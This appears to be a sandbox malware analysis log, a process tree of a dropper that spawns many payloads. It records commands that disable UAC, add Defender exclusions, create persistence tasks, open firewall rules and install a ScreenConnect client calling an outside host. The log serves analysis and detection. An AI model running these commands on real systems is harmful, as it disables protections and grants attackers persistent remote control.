PID 2348 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\test.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 2908 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\Update.exe
PID 1472 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 2580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 2312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 2312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 2312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 2312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2908 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 2908 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 2908 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 2908 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
PID 1472 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1472 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1472 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 5104 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 1472 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1472 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1472 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1472 wrote to memory of 4364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1472 wrote to memory of 4600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\extrac32.exe
PID 1472 wrote to memory of 4600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\extrac32.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\a\1.exe

"C:\Users\Admin\AppData\Local\Temp\a\1.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd

C:\Users\Admin\AppData\Local\Temp\a\test.exe

"C:\Users\Admin\AppData\Local\Temp\a\test.exe"

C:\Users\Admin\AppData\Local\Temp\a\Update.exe

"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "opssvc wrsa"

C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe

"C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 634977

C:\Windows\SysWOW64\extrac32.exe

extrac32 /Y /E Gtk

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\findstr.exe

findstr /V "Constitution" Wagon

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q

C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com

Surrey.com Q

C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe

"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe

"C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"

C:\Users\Admin\AppData\Local\Temp\a\windows.exe

"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7DFC0315C2B2425ED030A7470E203C96 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID27B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259445449 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Users\Admin\AppData\Local\Temp\a\T.exe

"C:\Users\Admin\AppData\Local\Temp\a\T.exe"

C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe

"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"

C:\ProgramData\Bitdefender\$77-Bitdefender.exe

C:\ProgramData\Bitdefender\$77-Bitdefender.exe

C:\Users\Admin\AppData\Local\Temp\a\access.exe

"C:\Users\Admin\AppData\Local\Temp\a\access.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

C:\Users\Admin\AppData\Local\Temp\a\36.exe

"C:\Users\Admin\AppData\Local\Temp\a\36.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 156

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE189.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Users\Admin\AppData\Local\Temp\a\99999.exe

"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"

C:\Users\Admin\AppData\Local\Temp\a\22.exe

"C:\Users\Admin\AppData\Local\Temp\a\22.exe"

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe

"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"

C:\Users\Admin\AppData\Local\Temp\a\Network.exe

"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 684

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005B4" "00000000000003E0"

C:\Users\Admin\AppData\Local\Temp\a\rea.exe

"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force

C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe

"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AclqLgFB8I0B.bat" "

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE62.tmp"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 8BD0D7494D24BA86F55F18A3C1C05FB6

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp10A5.tmp"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 41A763ADD0F1DF3212DC42565CDD272C M Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=64840446-9df6-4c65-8411-6e7dc5c317a5&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "33ae33d0-0a18-44cf-9eee-21fa31a09983" "User"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "6908b49c-ba33-40d9-a062-3d98cb504da9" "System"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\h1jVzK3VHgGC.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe

"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"

C:\Users\Admin\AppData\Local\Temp\a\mod.exe

"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"

C:\Users\Admin\AppData\Local\Temp\a\Server.exe

"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"

C:\Users\Admin\AppData\Local\Temp\a\Client.exe

"C:\Users\Admin\AppData\Local\Temp\a\Client.exe"

C:\Users\Admin\AppData\Local\Temp\a\jij.exe

"C:\Users\Admin\AppData\Local\Temp\a\jij.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Users\Admin\AppData\Local\Temp\a\333.exe

"C:\Users\Admin\AppData\Local\Temp\a\333.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\csGMovlsCz1U.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NFL5X40U9rBT.bat" "

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gGd6Sc0CVxKo.bat" "

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\yP7ocPgnzpZX.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {84918601-C221-4502-93B5-1C459B54D35C} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\txmSbpHR1z93.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\5CN0SmO4YDaR.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "651472643-1851480589-1118793646175173931221757700610928288111902706164902750728"

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zE5EsdTQVLTE.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RH1PaQhQWwXm.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hrQrQWtmNAup.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "933312609-406731408-1790982925-15858158391545171218-1087195369-874683945-276761312"

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XxLvY69ABsZF.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\H0JK71MDoDiA.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NLqbDa60jHZY.bat" "

C:\Windows\SysWOW64\netsh.exe

